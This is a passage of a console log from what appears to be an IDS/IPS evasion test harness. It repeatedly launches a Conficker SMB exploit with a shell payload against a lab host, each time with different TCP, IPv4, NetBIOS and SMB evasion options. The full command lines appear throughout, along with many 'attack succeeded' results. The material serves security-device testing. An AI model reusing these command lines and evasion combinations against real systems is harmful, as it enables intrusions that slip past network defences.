  4519. - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  4520. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4521. - 75% probability to add a zero urgent data byte to a TCP segment.
  4522.  
  4523. Info: NetBIOS connection 10.62.90.112:31480 -> 10.35.1.207:445
  4524. Terminated
  4525. .
  4526. 7712 runs averaging 1.94 runs / second ; progress: 3982/43200.........
  4527. 7721 runs averaging 1.94 runs / second ; progress: 3988/43200..........
  4528. 7731 runs averaging 1.94 runs / second ; progress: 3993/43200.....
  4529. 7736 runs averaging 1.94 runs / second ; progress: 3998/43200............
  4530. 7748 runs averaging 1.94 runs / second ; progress: 4003/43200....................
  4531. 7768 runs averaging 1.94 runs / second ; progress: 4008/43200.............
  4532. 7781 runs averaging 1.94 runs / second ; progress: 4013/43200.......
  4533. 7788 runs averaging 1.94 runs / second ; progress: 4018/43200..........
  4534. 7798 runs averaging 1.94 runs / second ; progress: 4023/43200...................2015-06-08 00:26:37 INFO
  4535. Success. (10.62.90.117):
  4536. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35633 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=uj13gaG/tWg --evasion=[start,msrpc_bind]tcp_paws,"21","10082354","shuffle" --evasion=[start,end]tcp_paws,"25%","268435455","shuffle30" --verifydelay=1000 --payload=shell
  4537. Info: Using random seed uj13gaG/tWi
  4538. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 30 bytes of original payload, then shuffled original payload
  4539. The following evasions are applied from stage start to msrpc_bind:
  4540. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10082354> and has shuffled original payload
  4541.  
  4542. Info: NetBIOS connection 10.62.90.117:35633 -> 10.35.1.207:445
  4543. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4544. Info: Sending MSRPC request with exploit
  4545. Info: Shell found, attack succeeded
  4546. Info: Shell closed
  4547. 0: Success.
  4548. ..
  4549. 7820 runs averaging 1.94 runs / second ; progress: 4028/43200....2015-06-08 00:26:39 INFO
  4550. Success. (10.62.90.112):
  4551. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59405 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=kJsTKME6sVk --evasion=[netbios_connect,smb_opentree]tcp_overlap,"1479","new","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"25%","7","alphanumrandomized" --evasion=[smb_connect,end]tcp_paws,"50%","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
  4552. Info: Using random seed kJsTKME6sVm
  4553. The following evasions are applied from stage netbios_connect to smb_opentree:
  4554. - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  4555. The following evasions are applied from stage smb_connect to msrpc_req:
  4556. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
  4557. The following evasions are applied from stage smb_connect to end:
  4558. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
  4559.  
  4560. Info: NetBIOS connection 10.62.90.112:59405 -> 10.35.1.207:445
  4561. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4562. Info: Sending MSRPC request with exploit
  4563. Info: Shell found, attack succeeded
  4564. Info: Shell closed
  4565. 0: Success.
  4566. ......
  4567. 7831 runs averaging 1.94 runs / second ; progress: 4033/432002015-06-08 00:26:43 INFO
  4568. Success. (10.62.90.119):
  4569. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18078 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=de5xLhxtOOU --evasion=[smb_openpipe,end]smb_decoytrees,"4","3","1","random_msrpcbind" --evasion=[msrpc_bind,end]smb_seg,"7" --verifydelay=1000 --payload=shell
  4570. Info: Using random seed de5xLhxtOOV
  4571. The following evasions are applied from stage smb_openpipe to end:
  4572. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
  4573. The following evasions are applied from stage msrpc_bind to end:
  4574. - SMB writes are segmented to contain at most 7 bytes of payload.
  4575.  
  4576. Info: NetBIOS connection 10.62.90.119:18078 -> 10.35.1.207:445
  4577. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4578. Info: Sending MSRPC request with exploit
  4579. Info: Shell found, attack succeeded
  4580. Info: Shell closed
  4581. 0: Success.
  4582. ......
  4583. 7838 runs averaging 1.94 runs / second ; progress: 4038/43200.....
  4584. 7843 runs averaging 1.94 runs / second ; progress: 4043/43200.2015-06-08 00:26:53 INFO
  4585. Success. (10.62.90.117):
  4586. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40870 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=SXLFlo5iPRg --evasion=[smb_connect,msrpc_bind]smb_decoytrees,"1","3","5","random_alphanum" --evasion=[smb_openpipe,end]tcp_paws,"75%","8","random_alphanum" --verifydelay=1000 --payload=shell
  4587. Info: Using random seed SXLFlo5iPRh
  4588. The following evasions are applied from stage smb_connect to msrpc_bind:
  4589. - Before normal SMB writes, 1 SMB trees are opened and 3 writes are performed to them. The write payload is 5 random alphanumeric bytes.
  4590. The following evasions are applied from stage smb_openpipe to end:
  4591. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
  4592.  
  4593. Info: NetBIOS connection 10.62.90.117:40870 -> 10.35.1.207:445
  4594. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4595. Info: Sending MSRPC request with exploit
  4596. Info: Shell found, attack succeeded
  4597. Info: Shell closed
  4598. 0: Success.
  4599. ...........
  4600. 7856 runs averaging 1.94 runs / second ; progress: 4048/43200...............2015-06-08 00:27:03 INFO
  4601. Success. (10.62.90.112):
  4602. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34053 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=Gnk5u9SA84k --evasion=[msrpc_bind,end]smb_decoytrees,"5","5","3","random_msrpcreq" --evasion=[netbios_connect,smb_openpipe]tcp_paws,"25%","171738880","unmodified" --verifydelay=1000 --payload=shell
  4603. Info: Using random seed Gnk5u9SA84k
  4604. The following evasions are applied from stage netbios_connect to smb_openpipe:
  4605.  
  4606. The following evasions are applied from stage msrpc_bind to end:
  4607. - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  4608.  
  4609. Info: NetBIOS connection 10.62.90.112:34053 -> 10.35.1.207:445
  4610. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4611. Info: Sending MSRPC request with exploit
  4612. Info: Shell found, attack succeeded
  4613. Info: Shell closed
  4614. 0: Success.
  4615.  
  4616. 7872 runs averaging 1.94 runs / second ; progress: 4053/43200.......
  4617. 7879 runs averaging 1.94 runs / second ; progress: 4058/43200.......
  4618. 7886 runs averaging 1.94 runs / second ; progress: 4063/43200.....2015-06-08 00:27:17 INFO
  4619. Success. (10.62.90.119):
  4620. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23024 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=QyM7Ixajmbw --evasion=[smb_connect,smb_opentree]smb_chaff,"75%","write_flag","zero" --evasion=[msrpc_bind,end]tcp_paws,"25%","33949496","zero" --verifydelay=1000 --payload=shell
  4621. Info: Using random seed QyM7Ixajmbx
  4622. The following evasions are applied from stage smb_connect to smb_opentree:
  4623. - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  4624. The following evasions are applied from stage msrpc_bind to end:
  4625. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33949496> and has 0x00 bytes as payload
  4626.  
  4627. Info: NetBIOS connection 10.62.90.119:23024 -> 10.35.1.207:445
  4628. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4629. Info: Sending MSRPC request with exploit
  4630. Info: Shell found, attack succeeded
  4631. Info: Shell closed
  4632. 0: Success.
  4633.  
  4634. 7892 runs averaging 1.94 runs / second ; progress: 4068/43200.....
  4635. 7897 runs averaging 1.94 runs / second ; progress: 4073/43200....
  4636. 7901 runs averaging 1.94 runs / second ; progress: 4078/43200....
  4637. 7905 runs averaging 1.94 runs / second ; progress: 4083/43200
  4638. 7905 runs averaging 1.93 runs / second ; progress: 4088/43200..
  4639. 7907 runs averaging 1.93 runs / second ; progress: 4093/43200....
  4640. 7911 runs averaging 1.93 runs / second ; progress: 4098/43200.....
  4641. 7916 runs averaging 1.93 runs / second ; progress: 4103/43200........
  4642. 7924 runs averaging 1.93 runs / second ; progress: 4108/43200Pid 30195 timed out - killed
  4643. 2015-06-08 00:27:59 INFO
  4644. Timed out (10.62.90.111):
  4645. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28186 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=n/6DiCvgfXw --evasion=[smb_connect,msrpc_req]ipv4_frag,"80" --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  4646. Info: Using random seed n/6DiCvgfXy
  4647. The following evasions are applied from stage netbios_connect to msrpc_bind:
  4648. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  4649. The following evasions are applied from stage smb_connect to msrpc_req:
  4650. - IPv4 fragments with at most 80 bytes per fragment
  4651.  
  4652. Info: NetBIOS connection 10.62.90.111:28186 -> 10.35.1.207:445
  4653. Terminated
  4654. .........
  4655. 7934 runs averaging 1.93 runs / second ; progress: 4113/43200.......Pid 30292 timed out - killed
  4656. 2015-06-08 00:28:06 INFO
  4657. Timed out (10.62.90.118):
  4658. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49892 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Z7tH6rtzJ0E --evasion=[smb_connect,smb_openpipe]ipv4_opt,"75%","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"9","new","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  4659. Info: Using random seed Z7tH6rtzJ0F
  4660. The following evasions are applied from stage smb_connect to smb_openpipe:
  4661. - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  4662. The duplicate packet has identical payload except that alphabetic characters are randomized
  4663. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4664. - TCP segments are set to overlap by 9 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  4665. The following evasions are applied from stage smb_openpipe to end:
  4666. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  4667.  
  4668. Info: NetBIOS connection 10.62.90.118:49892 -> 10.35.1.207:445
  4669. Terminated
  4670. .....
  4671. 7947 runs averaging 1.93 runs / second ; progress: 4118/43200.............
  4672. 7960 runs averaging 1.93 runs / second ; progress: 4123/43200........Pid 30548 timed out - killed
  4673. 2015-06-08 00:28:16 INFO
  4674. Timed out (10.62.90.114):
  4675. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40982 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4MS2bDmeUFo --evasion=[msrpc_req,end]ipv4_frag,"40" --evasion=[smb_openpipe,end]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
  4676. Info: Using random seed 4MS2bDmeUFr
  4677. The following evasions are applied from stage smb_openpipe to end:
  4678. - Add a random urgent data byte to every 1 TCP segment.
  4679. The following evasions are applied from stage msrpc_req to end:
  4680. - IPv4 fragments with at most 40 bytes per fragment
  4681.  
  4682. Info: NetBIOS connection 10.62.90.114:40982 -> 10.35.1.207:445
  4683. Terminated
  4684. .........
  4685. 7978 runs averaging 1.93 runs / second ; progress: 4128/43200...................
  4686. 7997 runs averaging 1.93 runs / second ; progress: 4133/43200............................
  4687. 8025 runs averaging 1.94 runs / second ; progress: 4138/43200..............
  4688. 8039 runs averaging 1.94 runs / second ; progress: 4143/43200....
  4689. 8043 runs averaging 1.94 runs / second ; progress: 4148/43200........
  4690. 8051 runs averaging 1.94 runs / second ; progress: 4153/43200...............
  4691. 8066 runs averaging 1.94 runs / second ; progress: 4158/43200............
  4692. 8078 runs averaging 1.94 runs / second ; progress: 4163/43200..............
  4693. 8092 runs averaging 1.94 runs / second ; progress: 4168/43200...............
  4694. 8107 runs averaging 1.94 runs / second ; progress: 4173/43200..........
  4695. 8117 runs averaging 1.94 runs / second ; progress: 4178/43200.........
  4696. 8126 runs averaging 1.94 runs / second ; progress: 4183/43200............
  4697. 8138 runs averaging 1.94 runs / second ; progress: 4188/43200..........
  4698. 8148 runs averaging 1.94 runs / second ; progress: 4193/43200....
  4699. 8152 runs averaging 1.94 runs / second ; progress: 4198/43200..Pid 31832 timed out - killed
  4700. 2015-06-08 00:29:31 INFO
  4701. Timed out (10.62.90.113):
  4702. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57268 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=uLFl/pvqX9E --evasion=[msrpc_req,end]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_connect,smb_openpipe]tcp_paws,"75%","268435455","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  4703. Info: Using random seed uLFl/pvqX9G
  4704. The following evasions are applied from stage smb_connect to smb_openpipe:
  4705. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  4706. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4707. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  4708. The following evasions are applied from stage msrpc_req to end:
  4709. - The SMB filename is obfuscated:
  4710. * Dummy paths are added ( a/b -> a/c/../b )
  4711. * A 0x00 and random alphanumeric characters are appended to the filename
  4712.  
  4713. Info: NetBIOS connection 10.62.90.113:57268 -> 10.35.1.207:445
  4714. Terminated
  4715. ..
  4716. 8157 runs averaging 1.94 runs / second ; progress: 4203/43200........
  4717. 8165 runs averaging 1.94 runs / second ; progress: 4208/43200..............
  4718. 8179 runs averaging 1.94 runs / second ; progress: 4213/43200....Pid 32234 timed out - killed
  4719. 2015-06-08 00:29:45 INFO
  4720. Timed out (10.62.90.116):
  4721. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25299 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=aed0q+Kl1ig --evasion=[start,end]tcp_inittsopt,"enable","zero" --evasion=[smb_opentree,end]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  4722. Info: Using random seed aed0q+Kl1ih
  4723. - TCP timestamps enabled, initial TCP timestamp is set to normal ( ie. taken from the timestamp clock ).
  4724. The following evasions are applied from stage smb_opentree to end:
  4725. - Add a random urgent data byte to every 2 TCP segment.
  4726.  
  4727. Info: NetBIOS connection 10.62.90.116:25299 -> 10.35.1.207:445
  4728. Terminated
  4729. .....2015-06-08 00:29:47 INFO
  4730. Success. (10.62.90.118):
  4731. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47685 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=y67+vnvZhII --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","4","alphanumrandomized" --evasion=[smb_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  4732. Info: Using random seed y67+vnvZhIL
  4733. The following evasions are applied from stage smb_connect to msrpc_bind:
  4734. - TCP timestamps echo reply value is sent in the wrong endianness
  4735. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4736. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
  4737.  
  4738. Info: NetBIOS connection 10.62.90.118:47685 -> 10.35.1.207:445
  4739. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4740. Info: Sending MSRPC request with exploit
  4741. Info: Shell found, attack succeeded
  4742. Info: Shell closed
  4743. 0: Success.
  4744. ......
  4745. 8196 runs averaging 1.94 runs / second ; progress: 4218/43200...................
  4746. 8215 runs averaging 1.95 runs / second ; progress: 4223/43200...............
  4747. 8230 runs averaging 1.95 runs / second ; progress: 4228/43200.......2015-06-08 00:30:02 INFO
  4748. Success. (10.62.90.112):
  4749. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10344 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=36UEqLYSE18 --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","9","random_alpha" --evasion=[msrpc_bind,end]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  4750. Info: Using random seed 36UEqLYSE1/
  4751. The following evasions are applied from stage smb_opentree to msrpc_req:
  4752. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alpha bytes as payload
  4753. The following evasions are applied from stage msrpc_bind to end:
  4754. - 25% probability to add a zero urgent data byte to a TCP segment.
  4755.  
  4756. Info: NetBIOS connection 10.62.90.112:10344 -> 10.35.1.207:445
  4757. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4758. Info: Sending MSRPC request with exploit
  4759. Info: Shell found, attack succeeded
  4760. Info: Shell closed
  4761. 0: Success.
  4762. 2015-06-08 00:30:02 INFO
  4763. Success. (10.62.90.114):
  4764. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50948 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=aHMCcAh1EZg --evasion=[smb_connect,smb_openpipe]ipv4_opt,"1","inc","shuffletcp" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","268435455","random_alpha" --verifydelay=1000 --payload=shell
  4765. Info: Using random seed aHMCcAh1EZh
  4766. The following evasions are applied from stage smb_connect to smb_openpipe:
  4767. - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4768. The duplicate packet has shuffled TCP payload
  4769. The following evasions are applied from stage smb_opentree to msrpc_req:
  4770. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  4771.  
  4772. Info: NetBIOS connection 10.62.90.114:50948 -> 10.35.1.207:445
  4773. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4774. Info: Sending MSRPC request with exploit
  4775. Info: Shell found, attack succeeded
  4776. Info: Shell closed
  4777. 0: Success.
  4778. ..
  4779. 8241 runs averaging 1.95 runs / second ; progress: 4234/43200.2015-06-08 00:30:04 INFO
  4780. Success. (10.62.90.114):
  4781. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58105 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=TJu3ax2/y1E --evasion=[smb_connect,smb_openpipe]ipv4_opt,"50%","inc","random_alphanum" --evasion=[msrpc_bind,end]tcp_paws,"1","2","shuffle" --verifydelay=1000 --payload=shell
  4782. Info: Using random seed TJu3ax2/y1F
  4783. The following evasions are applied from stage smb_connect to smb_openpipe:
  4784. - 50% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  4785. The duplicate packet has random alphanumeric bytes as payload
  4786. The following evasions are applied from stage msrpc_bind to end:
  4787. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has shuffled original payload
  4788.  
  4789. Info: NetBIOS connection 10.62.90.114:58105 -> 10.35.1.207:445
  4790. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4791. Info: Sending MSRPC request with exploit
  4792. Info: Shell found, attack succeeded
  4793. Info: Shell closed
  4794. 0: Success.
  4795. .2015-06-08 00:30:07 INFO
  4796. Success. (10.62.90.114):
  4797. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51356 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=FeVeSaOFJ/M --evasion=[smb_connect,msrpc_bind]ipv4_opt,"13","inc","random_alpha" --evasion=[netbios_connect,end]tcp_paws,"75%","5","shuffle" --verifydelay=1000 --payload=shell
  4798. Info: Using random seed FeVeSaOFJ/M
  4799. The following evasions are applied from stage netbios_connect to end:
  4800. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has shuffled original payload
  4801. The following evasions are applied from stage smb_connect to msrpc_bind:
  4802. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4803. The duplicate packet has random alphabetic bytes as payload
  4804.  
  4805. Info: NetBIOS connection 10.62.90.114:51356 -> 10.35.1.207:445
  4806. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4807. Info: Sending MSRPC request with exploit
  4808. Info: Shell found, attack succeeded
  4809. Info: Shell closed
  4810. 0: Success.
  4811. .
  4812. 8246 runs averaging 1.95 runs / second ; progress: 4239/43200............
  4813. 8258 runs averaging 1.95 runs / second ; progress: 4244/43200......
  4814. 8264 runs averaging 1.95 runs / second ; progress: 4249/43200..........
  4815. 8274 runs averaging 1.95 runs / second ; progress: 4254/43200..
  4816. 8276 runs averaging 1.94 runs / second ; progress: 4259/43200........
  4817. 8284 runs averaging 1.94 runs / second ; progress: 4264/43200.......
  4818. 8291 runs averaging 1.94 runs / second ; progress: 4269/43200.......2015-06-08 00:30:42 INFO
  4819. Success. (10.62.90.116):
  4820. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55922 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=1c9Z+P8xUFc --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"5","3","8","random_msrpcbind" --evasion=[smb_openpipe,end]smb_fnameobf,"change_case|add_paths" --verifydelay=1000 --payload=shell
  4821. Info: Using random seed 1c9Z+P8xUFf
  4822. The following evasions are applied from stage smb_openpipe to end:
  4823. - The SMB filename is obfuscated:
  4824. * Random characters case is changed
  4825. * Dummy paths are added ( a/b -> a/c/../b )
  4826. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4827. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
  4828.  
  4829. Info: NetBIOS connection 10.62.90.116:55922 -> 10.35.1.207:445
  4830. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4831. Info: Sending MSRPC request with exploit
  4832. Info: Shell found, attack succeeded
  4833. Info: Shell closed
  4834. 0: Success.
  4835. ..
  4836. 8301 runs averaging 1.94 runs / second ; progress: 4274/43200.....
  4837. 8306 runs averaging 1.94 runs / second ; progress: 4279/43200...........
  4838. 8317 runs averaging 1.94 runs / second ; progress: 4284/43200........
  4839. 8325 runs averaging 1.94 runs / second ; progress: 4289/432002015-06-08 00:30:59 INFO
  4840. Success. (10.62.90.112):
  4841. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44164 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=5Lqf8qkQDN4 --evasion=[msrpc_bind,end]netbios_chaff,"50%","empty_keepalive|msrpc_req|broken_length" --evasion=[msrpc_req,end]tcp_paws,"75%","6","random_alphanum" --verifydelay=1000 --payload=shell
  4842. Info: Using random seed 5Lqf8qkQDN7
  4843. The following evasions are applied from stage msrpc_bind to end:
  4844. - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  4845. The following evasions are applied from stage msrpc_req to end:
  4846. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alphanumeric bytes as payload
  4847.  
  4848. Info: NetBIOS connection 10.62.90.112:44164 -> 10.35.1.207:445
  4849. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4850. Info: Sending MSRPC request with exploit
  4851. Info: Shell found, attack succeeded
  4852. Info: Shell closed
  4853. 0: Success.
  4854. ...2015-06-08 00:31:01 INFO
  4855. Success. (10.62.90.112):
  4856. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26976 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=0CPbLvEWtYI --evasion=[start,end]tcp_paws,"1","3","alpharandomized" --evasion=[smb_opentree,end]tcp_paws,"5","159580752","unmodified" --verifydelay=1000 --payload=shell
  4857. Info: Using random seed 0CPbLvEWtYL
  4858. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphabetic bytes randomized
  4859. The following evasions are applied from stage smb_opentree to end:
  4860.  
  4861.  
  4862. Info: NetBIOS connection 10.62.90.112:26976 -> 10.35.1.207:445
  4863. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4864. Info: Sending MSRPC request with exploit
  4865. Info: Shell found, attack succeeded
  4866. Info: Shell closed
  4867. 0: Success.
  4868. .
  4869. 8331 runs averaging 1.94 runs / second ; progress: 4294/43200
  4870. 8331 runs averaging 1.94 runs / second ; progress: 4299/43200........
  4871. 8339 runs averaging 1.94 runs / second ; progress: 4304/43200...............
  4872. 8354 runs averaging 1.94 runs / second ; progress: 4309/43200...............
  4873. 8369 runs averaging 1.94 runs / second ; progress: 4314/43200....
  4874. 8373 runs averaging 1.94 runs / second ; progress: 4319/43200.....
  4875. 8378 runs averaging 1.94 runs / second ; progress: 4324/43200......Pid 1662 timed out - killed
  4876. 2015-06-08 00:31:38 INFO
  4877. Timed out (10.62.90.110):
  4878. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25353 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=fWA5nBt8494 --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"change_case|add_paths" --evasion=[smb_connect,end]tcp_paws,"5","238199066","random_alpha" --evasion=[smb_opentree,end]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
  4879. Info: Using random seed fWA5nBt8495
  4880. The following evasions are applied from stage smb_connect to end:
  4881. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238199066> and has random alpha bytes as payload
  4882. The following evasions are applied from stage smb_opentree to end:
  4883. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  4884. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4885. - The SMB filename is obfuscated:
  4886. * Random characters case is changed
  4887. * Dummy paths are added ( a/b -> a/c/../b )
  4888.  
  4889. Info: NetBIOS connection 10.62.90.110:25353 -> 10.35.1.207:445
  4890. Terminated
  4891.  
